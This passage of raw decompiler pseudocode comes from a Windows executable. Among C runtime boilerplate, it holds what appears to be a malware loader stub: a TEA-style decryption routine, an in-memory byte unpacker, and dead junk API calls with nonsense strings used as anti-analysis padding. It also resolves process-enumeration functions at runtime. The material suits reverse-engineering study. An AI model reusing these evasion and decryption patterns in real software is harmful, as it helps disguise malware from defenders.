      ;
    return v1 - (a1 + 1);
  }
  return v2;
}

//----- (00401DC6) --------------------------------------------------------
int sub_401DC6()
{
  return 0x7FFFFFFF;
}

//----- (00401DD2) --------------------------------------------------------
int __stdcall sub_401DD2(int a1)
{
  return 0x7FFFFFFF;
}

//----- (00401DDA) --------------------------------------------------------
int sub_401DDA()
{
  return -2;
}

//----- (00401DDE) --------------------------------------------------------
int sub_401DDE()
{
  return 2147483646;
}

//----- (00401DE4) --------------------------------------------------------
int __stdcall sub_401DE4(int a1, int a2)
{
  int v2; // eax
  char *v3; // ecx

  v2 = sub_403FD5(a2);
  v3 = "unknown error";
  if ( v2 )
    v3 = (char *)v2;
  std::string::string(a1, v3);
  return a1;
}
// 401110: using guessed type _DWORD __thiscall std::string::string(_DWORD, void *Src);

//----- (00401E0A) --------------------------------------------------------
int __stdcall sub_401E0A(int a1, int a2)
{
  if ( a2 == 1 )
    std::string::string(a1, "iostream stream error");
  else
    sub_401DE4(a1, a2);
  return a1;
}
// 401110: using guessed type _DWORD __thiscall std::string::string(_DWORD, void *Src);

//----- (00401E34) --------------------------------------------------------
int __stdcall sub_401E34(int a1, int a2)
{
  int v2; // eax
  char *v3; // ecx

  v2 = sub_403FFF(a2);
  v3 = "unknown error";
  if ( v2 )
    v3 = (char *)v2;
  std::string::string(a1, v3);
  return a1;
}
// 401110: using guessed type _DWORD __thiscall std::string::string(_DWORD, void *Src);

//----- (00401E90) --------------------------------------------------------
const char *sub_401E90()
{
  return "generic";
}

//----- (00401E96) --------------------------------------------------------
const char *sub_401E96()
{
  return "iostream";
}

//----- (00401E9C) --------------------------------------------------------
const char *sub_401E9C()
{
  return "system";
}

//----- (00401EA2) --------------------------------------------------------
int sub_401EA2()
{
  int result; // eax

  result = dword_454A90 + 586102;
  dwSize = dword_454A90 + 586102;
  return result;
}
// 454A90: using guessed type int dword_454A90;

//----- (004031FF) --------------------------------------------------------
int __thiscall sub_4031FF(_DWORD *this)
{
  return this[4];
}

//----- (00403203) --------------------------------------------------------
int __stdcall sub_403203(int *a1, SIZE_T *a2)
{
  _BYTE *v2; // edi
  int i; // esi
  unsigned int v5; // ecx
  int v6; // eax
  char v7; // dh
  char v8; // bl
  int result; // eax
  WCHAR Dst[1024]; // [esp+Ch] [ebp-C2Ch] BYREF
  CHAR szLongPath[1024]; // [esp+80Ch] [ebp-42Ch] BYREF
  unsigned int j; // [esp+C0Ch] [ebp-2Ch]
  int v13; // [esp+C10h] [ebp-28h]
  int v14; // [esp+C14h] [ebp-24h]
  char v15; // [esp+C1Ah] [ebp-1Eh]
  char v16; // [esp+C1Bh] [ebp-1Dh]
  SIZE_T v17; // [esp+C1Ch] [ebp-1Ch]
  int v18; // [esp+C20h] [ebp-18h]
  char v19; // [esp+C27h] [ebp-11h]
  int v20; // [esp+C28h] [ebp-10h]
  int v21; // [esp+C2Ch] [ebp-Ch]
  int v22; // [esp+C30h] [ebp-8h]
  int v23; // [esp+C34h] [ebp-4h]
  char v24; // [esp+C47h] [ebp+Fh]
  char v25; // [esp+C47h] [ebp+Fh]

  v2 = a2;
  for ( i = 0; i < 9117715; ++i )
  {
    if ( i == 8832220 )
      v2 = LocalAlloc(0, *a2);
  }
  v17 = 0;
  v22 = 4;
  v5 = 0;
  for ( j = 0; v5 < *a2; j = v5 )
  {
    v6 = *a1;
    v7 = *(_BYTE *)(*a1 + v5 + 3);
    v24 = *(_BYTE *)(*a1 + v5);
    v19 = *(_BYTE *)(*a1 + v5 + 1);
    v16 = *(_BYTE *)(v6 + v5 + 2);
    v15 = v7;
    v20 = 2;
    v23 = 192;
    v25 = (4 * v7) & 0xC0 | v24;
    v14 = 4;
    v18 = 192;
    v19 |= (16 * v7) & 0xC0;
    if ( dwSize == 618 )
    {
      WritePrivateProfileStructW(
        L"socuhopaxatajesijavelatisiru zijokibocukiwi vohivaganadeyixetutowasovozo yipubigokumugohedilijonuci",
        L"yezi fowutikuyiwugefalofinaji",
        0,
        0,
        L"kubojasulekohibixozaxiti kab pewibu pobubavofigi pinope");
      v7 = v15;
    }
    v21 = 6;
    v13 = 192;
    v8 = (v7 << 6) | v16;
    if ( dwSize == 2153 )
    {
      ExpandEnvironmentStringsW(L"jebolarakasuwikesuru yunuxatuboda", Dst, 0);
      GetLongPathNameA(
        "duyumavohevifafajesibicepuxidu maxebocugazimehuxadixi citulosizinivuxolifiri vin",
        szLongPath,
        0);
    }
    v2[v17] = v25;
    v2[++v17] = v19;
    v2[++v17] = v8;
    ++v17;
    v5 = v22 + j;
  }
  *a1 = (int)v2;
  result = v17;
  *a2 = v17;
  return result;
}
// 403203: using guessed type WCHAR Dst[1024];
// 403203: using guessed type CHAR szLongPath[1024];

//----- (00403552) --------------------------------------------------------
unsigned int __stdcall sub_403552(unsigned int *a1, int *a2)
{
  unsigned int v2; // edi
  unsigned int result; // eax
  int v4; // [esp+Ch] [ebp-34h]
  int v5; // [esp+10h] [ebp-30h]
  int v6; // [esp+14h] [ebp-2Ch]
  int v7; // [esp+18h] [ebp-28h]
  unsigned int v8; // [esp+1Ch] [ebp-24h]
  int v9; // [esp+20h] [ebp-20h]
  unsigned int v10; // [esp+28h] [ebp-18h]

  v10 = *a1;
  v8 = a1[1];
  v9 = -957401312;
  v5 = *a2;
  v4 = a2[1];
  v7 = a2[2];
  v6 = a2[3];
  v2 = 0;
  result = *a1;
  do
  {
    v8 -= (v7 + 16 * result) ^ (v9 + result) ^ (v6 + (result >> 5));
    result = v10 - ((v5 + 16 * v8) ^ (v9 + v8) ^ (v4 + (v8 >> 5)));
    v10 = result;
    if ( dwSize == 5117 )
    {
      MoveFileA("Cep", "jilidimizicanorukepu nabufoxipaxo");
      result = v10;
    }
    ++v2;
    v9 += 1640531527;
  }
  while ( v2 < 0x20 );
  *a1 = v10;
  a1[1] = v8;
  return result;
}

//----- (004037A1) --------------------------------------------------------
unsigned int __stdcall sub_4037A1(int a1, unsigned int a2, int *a3)
{
  unsigned int result; // eax
  unsigned int i; // esi
  struct _OSVERSIONINFOEXA VersionInformation; // [esp+Ch] [ebp-A0h] BYREF
  int v6; // [esp+A8h] [ebp-4h]

  v6 = 8;
  result = a2 / 8;
  for ( i = 0; i < a2 / 8; ++i )
  {
    if ( dwSize == 4445 )
      VerifyVersionInfoA(&VersionInformation, 0, 0i64);
    result = sub_403552((unsigned int *)(a1 + 8 * i), a3);
  }
  return result;
}

//----- (00403883) --------------------------------------------------------
int __thiscall sub_403883(void *this)
{
  return *(_DWORD *)this;
}

//----- (00403886) --------------------------------------------------------
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  HMODULE ModuleHandleW; // edi
  char v6[548]; // [esp+1Ch] [ebp-228h] BYREF
  int v7; // [esp+240h] [ebp-4h]

  if ( dwSize == 412939 )
  {
    unknown_libname_15(0, 0, 0);
    sub_405000(1192811100.0, 1151441800.0);
  }
  strcpy(&byte_46AEE8, "kernel32.dll");
  lstrcpyW(&String1, L"kernel32.dll");
  ModuleHandleW = GetModuleHandleW(&String1);
  dword_468F10 = (int)ModuleHandleW;
  if ( dwSize == 956 )
    unknown_libname_15(0, 0, 0);
  strcpy((char *)&word_468F18, "CreateToolhelp32Snapshot");
  dword_468EFC = (int)GetProcAddress(ModuleHandleW, ProcName);
  strcpy(dword_469218, "Module32FirstW");
  dword_468F00 = (int)GetProcAddress(ModuleHandleW, dword_469218);
  if ( !((int (__stdcall *)(int, char *))dword_468F00)(v7, v6) )
    sub_4019AD();
  return 0;
}
// 468EFC: using guessed type int dword_468EFC;
// 468F00: using guessed type int dword_468F00;
// 468F10: using guessed type int dword_468F10;
// 468F18: using guessed type __int16 word_468F18;
// 468F1A: using guessed type int dword_468F1A;
// 468F1F: using guessed type int dword_468F1F;
// 46921C: using guessed type int dword_46921C;
// 46AEE8: using guessed type char byte_46AEE8;
// 46AEE9: using guessed type __int16 word_46AEE9;
// 46AEEB: using guessed type int dword_46AEEB;
// 403886: using guessed type char var_228[548];

//----- (00403B31) --------------------------------------------------------
void *__thiscall sub_403B31(void *this)
{
  return this;
}

//----- (00403B34) --------------------------------------------------------
std::exception *__thiscall sub_403B34(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &off_44ADF4;
  return this;
}
// 44ADF4: using guessed type int (__thiscall *off_44ADF4)(void *Block, char);

//----- (00403B75) --------------------------------------------------------
std::exception *__thiscall sub_403B75(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::bad_function_call::`vftable';
  return this;
}
// 44AE58: using guessed type void *std::bad_function_call::`vftable';

//----- (00403BA4) --------------------------------------------------------
std::exception *__thiscall sub_403BA4(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::invalid_argument::`vftable';
  return this;
}
// 44AE1C: using guessed type void *std::invalid_argument::`vftable';

//----- (00403BE1) --------------------------------------------------------
std::exception *__thiscall sub_403BE1(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::length_error::`vftable';
  return this;
}
// 44AE28: using guessed type void *std::length_error::`vftable';

//----- (00403C1E) --------------------------------------------------------
std::exception *__thiscall sub_403C1E(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::logic_error::`vftable';
  return this;
}
// 44AE10: using guessed type void *std::logic_error::`vftable';

//----- (00403C55) --------------------------------------------------------
std::exception *__thiscall sub_403C55(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::out_of_range::`vftable';
  return this;
}
// 44AE34: using guessed type void *std::out_of_range::`vftable';

//----- (00403C92) --------------------------------------------------------
std::exception *__thiscall sub_403C92(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::overflow_error::`vftable';
  return this;
}
// 44AE4C: using guessed type void *std::overflow_error::`vftable';

//----- (00403CCF) --------------------------------------------------------
std::exception *__thiscall sub_403CCF(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::regex_error::`vftable';
  *((_DWORD *)this + 3) = *((_DWORD *)a2 + 3);
  return this;
}
// 44AE78: using guessed type void *std::regex_error::`vftable';

//----- (00403D23) --------------------------------------------------------
std::exception *__thiscall sub_403D23(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::runtime_error::`vftable';
  return this;
}
// 44AE40: using guessed type void *std::runtime_error::`vftable';

//----- (00403D5A) --------------------------------------------------------
void __thiscall sub_403D5A(std::exception *this)
{
  *(_DWORD *)this = &off_44ADF4;
  sub_406243(this);
}
// 44ADF4: using guessed type int (__thiscall *off_44ADF4)(void *Block, char);

//----- (00403D6A) --------------------------------------------------------
std::exception *__thiscall sub_403D6A(std::exception *Block, char a2)
{
  *(_DWORD *)Block = &off_44ADF4;
  sub_406243(Block);
  if ( (a2 & 1) != 0 )
    j__free(Block);
  return Block;
}
// 44ADF4: using guessed type int (__thiscall *off_44ADF4)(void *Block, char);

//----- (00403D8F) --------------------------------------------------------
std::exception *__thiscall sub_403D8F(std::exception *Block, char a2)
{
  sub_406243(Block);
  if ( (a2 & 1) != 0 )
    j__free(Block);
  return Block;
}

//----- (00403FC9) --------------------------------------------------------
void ***sub_403FC9()
{
  return &off_454AA0;
}
// 454AA0: using guessed type void **off_454AA0;

//----- (00403FCF) --------------------------------------------------------
const char *sub_403FCF()
{
  return "bad function call";
}

//----- (00403FD5) --------------------------------------------------------
int __cdecl sub_403FD5(int a1)
{
  _DWORD *v1; // eax

  v1 = &unk_44B610;
  if ( !"address family not supported" )
    return 0;
  while ( *v1 != a1 )
  {
    v1 += 2;
    if ( !v1[1] )
      return 0;
  }
  return v1[1];
}

//----- (00403FFF) --------------------------------------------------------
int __cdecl sub_403FFF(int a1)
{
  _DWORD *v1; // eax

  v1 = &unk_44B3B8;
  if ( !"permission denied" )
    return 0;
  while ( *v1 != a1 )
  {
    v1 += 2;
    if ( !v1[1] )
      return 0;
  }
  return v1[1];
}

//----- (00405000) --------------------------------------------------------
int __cdecl sub_405000(double a1, double a2)
{
  return _ctrandisp2(a1, a2);
}

//----- (0040500A) --------------------------------------------------------
int __thiscall sub_40500A(void *this)
{
  return _cintrindisp2(this, &unk_44CF80);
}
// 40B5D0: using guessed type int __fastcall _cintrindisp2(_DWORD, _DWORD);

//----- (00405D74) --------------------------------------------------------
_DWORD *__thiscall sub_405D74(_DWORD *this, int a2)
{
  *this = &off_44C178;
  return this;
}
// 44C178: using guessed type int (__thiscall *off_44C178)(void *Block, char);

//----- (00405D7F) --------------------------------------------------------
int __thiscall sub_405D7F(_DWORD *this)
{
  *this = &off_44C178;
  return unknown_libname_26(this);
}
// 40DE17: using guessed type _DWORD __cdecl unknown_libname_26(_DWORD);
// 44C178: using guessed type int (__thiscall *off_44C178)(void *Block, char);

//----- (00405D8D) --------------------------------------------------------
void *__thiscall sub_405D8D(void *this, int a2)
{
  return this;
}

//----- (00405DCF) --------------------------------------------------------
_DWORD *__thiscall sub_405DCF(_DWORD *Block, char a2)
{
  sub_405D7F(Block);
  if ( (a2 & 1) != 0 )
    j__free(Block);
  return Block;
}

//----- (00405E3A) --------------------------------------------------------
char *__thiscall sub_405E3A(char *this)
{
  return this + 8;
}

//----- (00406198) --------------------------------------------------------
std::exception *__thiscall sub_406198(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::bad_typeid::`vftable';
  return this;
}
// 44C1B0: using guessed type void *std::bad_typeid::`vftable';

//----- (004061B3) --------------------------------------------------------
std::exception *__thiscall sub_4061B3(std::exception *this, char *a2)
{
  std::exception::exception(this, (const char *const *)&a2);
  *(_DWORD *)this = &std::bad_typeid::`vftable';
  return this;
}
// 44C1B0: using guessed type void *std::bad_typeid::`vftable';

//----- (00406243) --------------------------------------------------------
void __thiscall sub_406243(std::exception *this)
{
  *(_DWORD *)this = &std::exception::`vftable';
  std::exception::_Tidy(this);
}
// 44C184: using guessed type void *std::exception::`vftable';

//----- (00406281) --------------------------------------------------------
std::exception *__thiscall sub_406281(std::exception *Block, char a2)
{
  *(_DWORD *)Block = &std::exception::`vftable';
  std::exception::_Tidy(Block);
  if ( (a2 & 1) != 0 )
    j__free(Block);
  return Block;
}
// 44C184: using guessed type void *std::exception::`vftable';

//----- (0040630D) --------------------------------------------------------
void __thiscall sub_40630D(void *this)
{
  if ( this != (void *)dword_4556C0 )
    __report_gsfailure();
}
// 4556C0: using guessed type int dword_4556C0;

//----- (00406661) --------------------------------------------------------
void *__cdecl sub_406661(void *a1)
{
  void *result; // eax

  result = a1;
  dword_47137C = a1;
  return result;
}

//----- (004067CE) --------------------------------------------------------
void *__cdecl sub_4067CE(void *a1)
{
  void *result; // eax

  result = a1;
  dword_471380 = a1;
  return result;
}

//----- (00406EAC) --------------------------------------------------------
void *__cdecl sub_406EAC(void *a1)
{
  void *result; // eax

  result = a1;
  dword_471390 = a1;
  return result;
}

//----- (00406F5F) --------------------------------------------------------
void sub_406F5F()
{
  void (**i)(void); // esi

  for ( i = dword_452154; i < dword_452154; ++i )
  {
    if ( *i )
      (*i)();
  }
}
// 452154: using guessed type void (*dword_452154[2])(void);

//----- (00406F7F) --------------------------------------------------------
void __cdecl sub_406F7F()
{
  void (**i)(void); // esi

  for ( i = &dword_45215C; i < &dword_45215C; ++i )
  {
    if ( *i )
      (*i)();
  }
}
// 45215C: using guessed type void (*dword_45215C)(void);

//----- (0040774B) --------------------------------------------------------
void __cdecl sub_40774B(DWORD dwMilliseconds)
{
  Sleep(dwMilliseconds);
}

//----- (00407CC9) --------------------------------------------------------
PVOID sub_407CC9()
{
  return DecodePointer(dword_471B24);
}

//----- (004081EC) --------------------------------------------------------
void *__cdecl sub_4081EC(void *a1)
{
  void *result; // eax

  result = a1;
  dword_471B30 = a1;
  return result;
}

//----- (00408C4B) --------------------------------------------------------
void **sub_408C4B()
{
  return &off_4552B8;
}
// 4552B8: using guessed type void *off_4552B8;

//----- (0040C52E) --------------------------------------------------------
DWORD sub_40C52E()
{
  return dwTlsIndex;
}

//----- (0040C957) --------------------------------------------------------
std::exception *__thiscall sub_40C957(std::exception *this, struct exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::bad_exception::`vftable';
  return this;
}
// 44D0D0: using guessed type void *std::bad_exception::`vftable';

//----- (0040C98E) --------------------------------------------------------
void __thiscall sub_40C98E(std::exception *this)
{
  *(_DWORD *)this = &std::bad_exception::`vftable';
  sub_406243(this);
}
// 44D0D0: using guessed type void *std::bad_exception::`vftable';

//----- (0040C999) --------------------------------------------------------
std::exception *__thiscall sub_40C999(std::exception *Block, char a2)
{
  *(_DWORD *)Block = &std::bad_exception::`vftable';
  sub_406243(Block);
  if ( (a2 & 1) != 0 )
    j__free(Block);
  return Block;
}
// 44D0D0: using guessed type void *std::bad_exception::`vftable';

//----- (0040D6C9) --------------------------------------------------------
int sub_40D6C9()
{
  return 16;
}

//----- (0040EA6F) --------------------------------------------------------
int sub_40EA6F()
{
  __crtSetUnhandledExceptionFilter(__CxxUnhandledExceptionFilter);
  return 0;
}

//----- (0040EC2A) --------------------------------------------------------
HANDLE sub_40EC2A()
{
  return hHeap;
}

//----- (0040EF6A) --------------------------------------------------------
int __cdecl sub_40EF6A(int a1)
{
  int result; // eax

  result = a1;
  dword_4714E8 = a1;
  return result;
}
// 4714E8: using guessed type int dword_4714E8;

//----- (0040FD32) --------------------------------------------------------
void sub_40FD32()
{
  dword_472144 = 0;
}
// 472144: using guessed type int dword_472144;

//----- (0040FF6F) --------------------------------------------------------
int __cdecl sub_40FF6F(const WCHAR *a1, int a2, int a3)
{
  int v3; // esi
  PVOID v4; // edi
  HMODULE Library; // edi
  FARPROC ProcAddress; // eax
  FARPROC v7; // eax
  FARPROC v8; // eax
  FARPROC v9; // eax
  FARPROC v10; // eax
  PVOID v12; // eax
  int v13; // eax
  int v14; // edi
  int (*v15)(void); // eax
  int (__stdcall *v16)(int); // eax
  int (__stdcall *v17)(int, LPCWSTR, int, int); // eax
  char v19[4]; // [esp+Ch] [ebp-24h] BYREF
  int v20; // [esp+10h] [ebp-20h]
  LPCWSTR lpOutputString; // [esp+14h] [ebp-1Ch]
  int (__stdcall *v22)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // [esp+18h] [ebp-18h]
  int (*IsPackagedApp)(void); // [esp+1Ch] [ebp-14h]
  char v24[12]; // [esp+20h] [ebp-10h] BYREF

  lpOutputString = a1;
  v3 = 0;
  v20 = a2;
  v4 = EncodePointer(0);
  v22 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))v4;
  IsPackagedApp = (int (*)(void))__crtIsPackagedApp();
  if ( !dword_4720A8 )
  {
    Library = LoadLibraryExW(L"USER32.DLL", 0, 0x800u);
    if ( !Library )
    {
      if ( GetLastError() != 87 )
        return 0;
      Library = LoadLibraryExW(L"USER32.DLL", 0, 0);
      if ( !Library )
        return 0;
    }
    ProcAddress = GetProcAddress(Library, "MessageBoxW");
    if ( !ProcAddress )
      return 0;
    dword_4720A8 = EncodePointer(ProcAddress);
    v7 = GetProcAddress(Library, "GetActiveWindow");
    dword_4720AC = EncodePointer(v7);
    v8 = GetProcAddress(Library, "GetLastActivePopup");
    dword_4720B0 = EncodePointer(v8);
    v9 = GetProcAddress(Library, "GetUserObjectInformationW");
    dword_4720B8 = EncodePointer(v9);
    if ( dword_4720B8 )
    {
      v10 = GetProcAddress(Library, "GetProcessWindowStation");
      dword_4720B4 = EncodePointer(v10);
    }
    v4 = v22;
  }
  if ( IsDebuggerPresent() )
  {
    if ( lpOutputString )
      OutputDebugStringW(lpOutputString);
    if ( IsPackagedApp )
      return 4;
  }
  else if ( IsPackagedApp )
  {
    DecodePointer(dword_4720A8);
    return 3;
  }
  if ( dword_4720B4 == v4
    || dword_4720B8 == v4
    || (IsPackagedApp = (int (*)(void))DecodePointer(dword_4720B4),
        v12 = DecodePointer(dword_4720B8),
        v22 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))v12,
        !IsPackagedApp)
    || !v12
    || (v13 = IsPackagedApp()) != 0 && v22(v13, 1, v24, 12, v19) && (v24[8] & 1) != 0 )
  {
    if ( dword_4720AC != v4 )
    {
      v15 = (int (*)(void))DecodePointer(dword_4720AC);
      if ( v15 )
      {
        v3 = v15();
        if ( v3 )
        {
          if ( dword_4720B0 != v4 )
          {
            v16 = (int (__stdcall *)(int))DecodePointer(dword_4720B0);
            if ( v16 )
              v3 = v16(v3);
          }
        }
      }
    }
    v14 = a3;
  }
  else
  {
    v14 = a3 | 0x200000;
  }
  v17 = (int (__stdcall *)(int, LPCWSTR, int, int))DecodePointer(dword_4720A8);
  if ( v17 )
    return v17(v3, lpOutputString, v20, v14);
  return 0;
}
// 4073EE: using guessed type int __crtIsPackagedApp(void);
// 40FF6F: using guessed type char var_24[4];

//----- (00410976) --------------------------------------------------------
int sub_410976()
{
  return flsall(1);
}
// 4109D8: using guessed type _DWORD __cdecl flsall(_DWORD);

//----- (00411C2C) --------------------------------------------------------
int sub_411C2C()
{
  return 0;
}

//----- (0041203C) --------------------------------------------------------
_DWORD *__thiscall sub_41203C(_DWORD *this)
{
  *this = &DNameNode::`vftable';
  return this;
}
// 45011C: using guessed type void *DNameNode::`vftable';

//----- (00412420) --------------------------------------------------------
DName *__cdecl sub_412420(DName *a1, char a2, int a3)
{
  unknown_libname_30(a2);
  DName::operator+(a1, a3);
  return a1;
}
// 411E35: using guessed type _DWORD __stdcall unknown_libname_30(char);

//----- (0041526D) --------------------------------------------------------
char __thiscall sub_41526D(_BYTE *this)
{
  return this[4];
}

//----- (00417777) --------------------------------------------------------
int __thiscall sub_417777(_DWORD *this)
{
  return this[2];
}

//----- (0041777B) --------------------------------------------------------
int sub_41777B()
{
  return 1;
}

//----- (0041820F) --------------------------------------------------------
int sub_41820F()
{
  return dword_47212C;
}
// 47212C: using guessed type int dword_47212C;

//----- (00419A13) --------------------------------------------------------
void *sub_419A13()
{
  return off_455990;
}
// 455990: using guessed type void *off_455990;

//----- (0041AF56) --------------------------------------------------------
int sub_41AF56()
{
  return dword_472140;
}
// 472140: using guessed type int dword_472140;

//----- (0041AF5C) --------------------------------------------------------
void *sub_41AF5C()
{
  return &unk_47213C;
}

//----- (0041CA96) --------------------------------------------------------
int __cdecl sub_41CA96(unsigned __int16 *a1, _DWORD *a2)
{
  int v2; // ebx
  _DWORD *v3; // edi
  int v4; // edx
  int v5; // esi
  int v6; // eax
  int v7; // edx
  char v8; // cl
  bool i; // zf
  int v10; // edx
  unsigned int v11; // eax
  bool v12; // cf
  unsigned int v13; // eax
  int v14; // ecx
  int j; // edx
  unsigned int v16; // eax
  int v17; // eax
  int v18; // ecx
  int v19; // eax
  char v20; // di
  unsigned int v21; // eax
  int *v22; // edx
  int v23; // eax
  int ii; // ecx
  int v25; // edx
  char v26; // cl
  bool jj; // zf
  int v28; // edx
  unsigned int v29; // eax
  int v30; // ecx
  unsigned int v31; // eax
  int kk; // edx
  unsigned int v33; // eax
  int v34; // eax
  int v35; // edx
  int v36; // ecx
  int v37; // eax
  unsigned int v38; // eax
  int *v39; // edx
  int mm; // ecx
  int v41; // ecx
  int v42; // edi
  unsigned int v43; // eax
  int v44; // edx
  int *v45; // edx
  int n; // ecx
  int v47; // ecx
  int k; // esi
  unsigned int v49; // eax
  int *v50; // edx
  int m; // ecx
  unsigned int v52; // esi
  int v53; // eax
  int v55; // [esp+Ch] [ebp-44h]
  int v56; // [esp+14h] [ebp-3Ch]
  int v57; // [esp+14h] [ebp-3Ch]
  unsigned int v58; // [esp+18h] [ebp-38h]
  char v59; // [esp+18h] [ebp-38h]
  int v60; // [esp+18h] [ebp-38h]
  int v61; // [esp+18h] [ebp-38h]
  int v62; // [esp+1Ch] [ebp-34h]
  int v63; // [esp+1Ch] [ebp-34h]
  int v64; // [esp+1Ch] [ebp-34h]
  char v65; // [esp+20h] [ebp-30h]
  int v66; // [esp+24h] [ebp-2Ch]
  int v67; // [esp+28h] [ebp-28h]
  int v68; // [esp+28h] [ebp-28h]
  char v69; // [esp+28h] [ebp-28h]
  int v70; // [esp+28h] [ebp-28h]
  int v71; // [esp+2Ch] [ebp-24h]
  unsigned int v72; // [esp+2Ch] [ebp-24h]
  int v73; // [esp+30h] [ebp-20h]
  int v74; // [esp+30h] [ebp-20h]
  int v75; // [esp+30h] [ebp-20h]
  int v76; // [esp+30h] [ebp-20h]
  int v77; // [esp+30h] [ebp-20h]
  int v78; // [esp+34h] [ebp-1Ch]
  int v79; // [esp+38h] [ebp-18h]
  int v80; // [esp+3Ch] [ebp-14h]
  int v81; // [esp+40h] [ebp-10h] BYREF
  int v82; // [esp+44h] [ebp-Ch]
  int v83; // [esp+48h] [ebp-8h] BYREF

  v2 = 0;
  v3 = a2;
  v55 = a1[5] & 0x8000;
  v4 = (a1[5] & 0x7FFF) - 0x3FFF;
  v81 = *(_DWORD *)(a1 + 3);
  v82 = *(_DWORD *)(a1 + 1);
  v73 = v4;
  v83 = *a1 << 16;
  if ( v4 == -16383 )
  {
    v5 = 0;
    v6 = 0;
    while ( !*(&v81 + v6) )
    {
      if ( ++v6 >= 3 )
        goto LABEL_84;
    }
    v81 = 0;
    v82 = 0;
    v83 = 0;
  }
  else
  {
    v71 = v4;
    v78 = v81;
    v62 = dword_455AA8 - 1;
    v66 = 0;
    v79 = v82;
    v80 = v83;
    v7 = dword_455AA8 / 32;
    v56 = dword_455AA8 / 32;
    v65 = 31 - dword_455AA8 % 32;
    v8 = v65;
    if ( ((1 << v65) & *(&v81 + dword_455AA8 / 32)) != 0 )
    {
      for ( i = (~(-1 << v65) & *(&v81 + v7)) == 0; i; i = *(&v81 + v7) == 0 )
      {
        if ( ++v7 >= 3 )
          goto LABEL_24;
      }
      v10 = v62 / 32;
      v66 = 0;
      v58 = 1 << (31 - v62 % 32);
      v11 = *(&v81 + v62 / 32);
      v12 = v11 + v58 < v11;
      v13 = v11 + v58;
      v14 = 0;
      if ( v12 || v13 < v58 )
      {
        v14 = 1;
        v66 = 1;
      }
      *(&v81 + v10) = v13;
      for ( j = v10 - 1; j >= 0; *(&v81 + j--) = v17 )
      {
        if ( !v14 )
          break;
        v16 = *(&v81 + j);
        v14 = 0;
        v66 = 0;
        v12 = v16 + 1 < v16;
        v17 = v16 + 1;
        if ( v12 || !v17 )
        {
          v14 = 1;
          v66 = 1;
        }
      }
      v8 = v65;
LABEL_24:
      v7 = v56;
    }
    *(&v81 + v7) &= -1 << v8;
    if ( v7 + 1 < 3 )
      memset(&v81 + v7 + 1, 0, 4 * (3 - (v7 + 1)));
    v18 = v73;
    if ( v66 )
      v18 = v73 + 1;
    if ( v18 >= dword_455AA4 - dword_455AA8 )
    {
      if ( v18 > dword_455AA4 )
      {
        if ( v18 < dword_455AA0 )
        {
          v81 &= ~0x80000000;
          v61 = v18 + dword_455AB4;
          v70 = dword_455AAC / 32;
          v47 = dword_455AAC % 32;
          v77 = 0;
          for ( k = 0; k < 3; ++k )
          {
            v49 = *(&v81 + k);
            *(&v81 + k) = v77 | (v49 >> v47);
            v77 = (~(-1 << v47) & v49) << (32 - v47);
          }
          v5 = v61;
          v50 = &v83 - v70;
          v2 = 0;
          for ( m = 2; m >= 0; --m )
          {
            if ( m < v70 )
              *(&v81 + m) = 0;
            else
              *(&v81 + m) = *v50;
            --v50;
          }
        }
        else
        {
          v82 = 0;
          v83 = 0;
          v81 = 0x80000000;
          v64 = dword_455AAC / 32;
          v41 = dword_455AAC % 32;
          v60 = dword_455AAC % 32;
          v76 = 0;
          v42 = ~(-1 << (dword_455AAC % 32));
          v69 = 32 - dword_455AAC % 32;
          do
          {
            v43 = *(&v81 + v2);
            v44 = v76 | (v43 >> v41);
            LOBYTE(v41) = v60;
            *(&v81 + v2++) = v44;
            v76 = (v42 & v43) << v69;
          }
          while ( v2 < 3 );
          v45 = &v83 - v64;
          for ( n = 2; n >= 0; --n )
          {
            if ( n < v64 )
              *(&v81 + n) = 0;
            else
              *(&v81 + n) = *v45;
            --v45;
          }
          v5 = dword_455AA0 + dword_455AB4;
          v2 = 1;
        }
        goto LABEL_83;
      }
      v81 = v78;
      v82 = v79;
      v57 = (dword_455AA4 - v71) / 32;
      v83 = v80;
      v19 = (dword_455AA4 - v71) % 32;
      v74 = 0;
      v20 = v19;
      v67 = ~(-1 << v19);
      v59 = 32 - v19;
      do
      {
        v21 = *(&v81 + v2);
        *(&v81 + v2++) = v74 | (v21 >> v20);
        v74 = (v67 & v21) << v59;
      }
      while ( v2 < 3 );
      v22 = &v83 - v57;
      v23 = v57;
      for ( ii = 2; ii >= 0; --ii )
      {
        if ( ii < v23 )
        {
          *(&v81 + ii) = 0;
        }
        else
        {
          *(&v81 + ii) = *v22;
          v23 = v57;
        }
        --v22;
      }
      v25 = (v62 + 1) / 32;
      v26 = 31 - (v62 + 1) % 32;
      if ( ((1 << v26) & *(&v81 + v25)) != 0 )
      {
        for ( jj = (~(-1 << v26) & *(&v81 + v25)) == 0; jj; jj = *(&v81 + v25) == 0 )
        {
          if ( ++v25 >= 3 )
            goto LABEL_56;
        }
        v28 = v62 / 32;
        v29 = *(&v81 + v62 / 32);
        v30 = 0;
        v72 = 1 << (31 - v62 % 32);
        v12 = v29 + v72 < v29;
        v31 = v29 + v72;
        if ( v12 || v31 < v72 )
          v30 = 1;
        *(&v81 + v28) = v31;
        for ( kk = v28 - 1; kk >= 0; *(&v81 + kk--) = v34 )
        {
          if ( !v30 )
            break;
          v33 = *(&v81 + kk);
          v30 = 0;
